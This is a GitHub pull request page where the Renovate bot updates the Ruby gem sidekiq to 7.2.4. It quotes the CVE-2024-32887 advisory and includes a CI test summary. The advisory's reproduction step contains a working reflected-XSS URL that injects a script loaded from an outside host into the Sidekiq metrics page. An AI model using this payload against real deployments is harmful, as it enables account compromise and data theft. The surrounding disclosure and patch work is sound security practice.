search

code0-tech / sagittarius

The orchestrating backend for the Code0 application
4 stars 0 forks source link

Update dependency sidekiq to v7.2.4 [SECURITY] #167

Closed renovate[bot] closed 2 months ago

renovate[bot] commented 2 months ago

Mend Renovate

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
sidekiq (source, changelog) 7.2.0 -> 7.2.4 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2024-32887

Description:

During the source Code Review of the metrics.erb view of the Sidekiq Web UI, A reflected XSS vulnerability is discovered. The value of substr parameter is reflected in the response without any encoding, allowing an attacker to inject Javascript code into the response of the application.

This vulnerability can be exploited to target the users of the application, and users of other applications deployed on the same domain or website as that of the Sidekiq website. Successful exploit results may result in compromise of user accounts and user data.

Impact:

The impact of this vulnerability can be severe. An attacker could exploit it to target users of the Sidekiq Web UI. Moreover, if other applications are deployed on the same domain or website as Sidekiq, users of those applications could also be affected, leading to a broader scope of compromise. Potentially compromising their accounts, forcing the users to perform sensitive actions, stealing sensitive data, performing CORS attacks, defacement of the web application, etc.

Mitigation:

Encode all output data before rendering it in the response to prevent XSS attacks.

Steps to Reproduce:

  1. Go to the following URL of the sidekiq Web UI: https://{host}/sidekiq/metrics?substr=beret%22%3E%3Cscript%20src=%22https://cheemahq.vercel.app/a.js%22%20/%3E
  2. XSS payload will be executed, causing a popup.

Evidence:

image Figure 1: Source Code Vulnerable to XSS

image Figure 2: XSS payload triggered

Release Notes

sidekiq/sidekiq (sidekiq) ### [`v7.2.4`](https://togithub.com/sidekiq/sidekiq/blob/HEAD/Changes.md#724) [Compare Source](https://togithub.com/sidekiq/sidekiq/compare/v7.2.3...v7.2.4) - Fix XSS in metrics filtering introduced in 7.2.0, CVE-2024-32887 Thanks to [@​UmerAdeemCheema](https://togithub.com/UmerAdeemCheema) for the security report. ### [`v7.2.3`](https://togithub.com/sidekiq/sidekiq/blob/HEAD/Changes.md#723) [Compare Source](https://togithub.com/sidekiq/sidekiq/compare/v7.2.2...v7.2.3) - [Support Dragonfly.io](https://www.mikeperham.com/2024/02/01/supporting-dragonfly/) as an alternative Redis implementation - Fix error unpacking some compressed error backtraces \[[#​6241](https://togithub.com/sidekiq/sidekiq/issues/6241)] - Fix potential heartbeat data leak \[[#​6227](https://togithub.com/sidekiq/sidekiq/issues/6227)] - Add ability to find a currently running work by jid \[[#​6212](https://togithub.com/sidekiq/sidekiq/issues/6212), fatkodima] ### [`v7.2.2`](https://togithub.com/sidekiq/sidekiq/blob/HEAD/Changes.md#722) [Compare Source](https://togithub.com/sidekiq/sidekiq/compare/v7.2.1...v7.2.2) - Add `Process.warmup` call in Ruby 3.3+ - Batch jobs now skip transactional push \[[#​6160](https://togithub.com/sidekiq/sidekiq/issues/6160)] ### [`v7.2.1`](https://togithub.com/sidekiq/sidekiq/blob/HEAD/Changes.md#721) [Compare Source](https://togithub.com/sidekiq/sidekiq/compare/v7.2.0...v7.2.1) - Add `Sidekiq::Work` type which replaces the raw Hash as the third parameter in `Sidekiq::WorkSet#each { |pid, tid, hash| ... }` \[[#​6145](https://togithub.com/sidekiq/sidekiq/issues/6145)] - **DEPRECATED**: direct access to the attributes within the `hash` block parameter above. The `Sidekiq::Work` instance contains accessor methods to get at the same data, e.g. ```ruby work["queue"] # Old work.queue # New ``` - Fix Ruby 3.3 warnings around `base64` gem \[[#​6151](https://togithub.com/sidekiq/sidekiq/issues/6151), earlopain]

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

This PR has been generated by Mend Renovate. View repository job log here.

github-actions[bot] commented 2 months ago

GitLab Pipeline Action

General information

Link to pipeline: https://gitlab.com/code0-tech/development/sagittarius/-/pipelines/1286295781

Status: Passed \ Duration: 6 minutes

Job summaries

rspec: [ee]

Coverage report available at https://code0-tech.gitlab.io/-/development/sagittarius/-/jobs/6826140931/artifacts/tmp/coverage/index.html Test summary available at https://gitlab.com/code0-tech/development/sagittarius/-/pipelines/1286295781/test_report Finished in 8.64 seconds (files took 7.2 seconds to load) 540 examples, 0 failures 1713 / 1979 LOC (86.56%) covered. [TEST PROF INFO] Time spent in factories: 00:03.648 (27.82% of total time)

rspec: [ce]

Coverage report available at https://code0-tech.gitlab.io/-/development/sagittarius/-/jobs/6826140930/artifacts/tmp/coverage/index.html Test summary available at https://gitlab.com/code0-tech/development/sagittarius/-/pipelines/1286295781/test_report Finished in 7.52 seconds (files took 7.01 seconds to load) 540 examples, 0 failures 1713 / 1979 LOC (86.56%) covered. [TEST PROF INFO] Time spent in factories: 00:03.477 (29.14% of total time)

docs:preview

Documentation preview available at https://code0-tech.gitlab.io/-/development/telescopium/-/jobs/6826157542/artifacts/dist/index.html

rubocop

294 files inspected, no offenses detected